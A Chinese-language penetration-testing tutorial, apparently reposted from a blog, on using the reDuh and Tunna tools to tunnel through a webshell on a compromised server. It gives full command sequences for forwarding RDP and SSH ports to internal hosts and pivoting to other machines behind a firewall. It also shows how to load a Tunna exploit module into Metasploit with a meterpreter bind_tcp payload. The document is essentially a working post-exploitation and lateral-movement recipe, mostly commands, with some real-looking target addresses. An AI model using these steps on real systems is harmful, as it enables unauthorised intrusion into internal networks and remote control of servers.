1.1reDuh
下载地址:https://github.com/sensepost/reDuh
1.reDuh使用条件
(1)获取目标服务器webshell,且可以上传reDuh服务端对应脚本文件。
(2)知道目标服务器开放的内网端口,如远程桌面的端口是3389。
(3)目标服务器网络做了端口策略限制,只允许外部访问内网的80等特定端口。
2. reDuh使用命令
(1)本地具备java环境,可以使用pentestbox自带java环境
java -jar reDuhClient.jar http://somesite.com/reDuh.aspx http or https port
(2)本地连接1010端口
nc -vv localhost 1010
(3)在java命令窗口执行
[createTunnel]1234:127.0.0.1:3389
(4)使用mstsc登录127.0.0.1:1234
1.2Tunna
https://github.com/SECFORCE/Tunna
(1)连接3389
python proxy.py -u http://172.0.0.1/conn.aspx -l 1234 -r 3389 –v
通过查看网上相关文章,只见conn.jsp和conn.php实现端口转发成功。
通过该方法访问内网的其他服务器,命令如下:
python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389
172.0.0.1是webshell所在服务器,172.0.0.2是内网访问的服务器,3389为远程终端端口,有些服务器修改器默认端口为其它端口。本地直接登录远程终端地址127.0.0.1:1234即可。参数含义如下:
-l 表示本地监听的端口
-r 远程要转发的端口
-v 详细模式
2.连接SSH
对于SSH服务需要添加-s参数,才能保证连接的时候不会中断,执行命令:
python proxy.py -u http://218.4.45.152:8877/job/conn.aspx -l 1234 -r 22 -v –s
在本地使用ssh连接1234端口即可:
ssh localhost -p 1234
3.MSF利用tunna转发
将tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.
cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7 //注意这里是指本地的公网IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit –j
原文地址:http://blog.51cto.com/simeon/2112416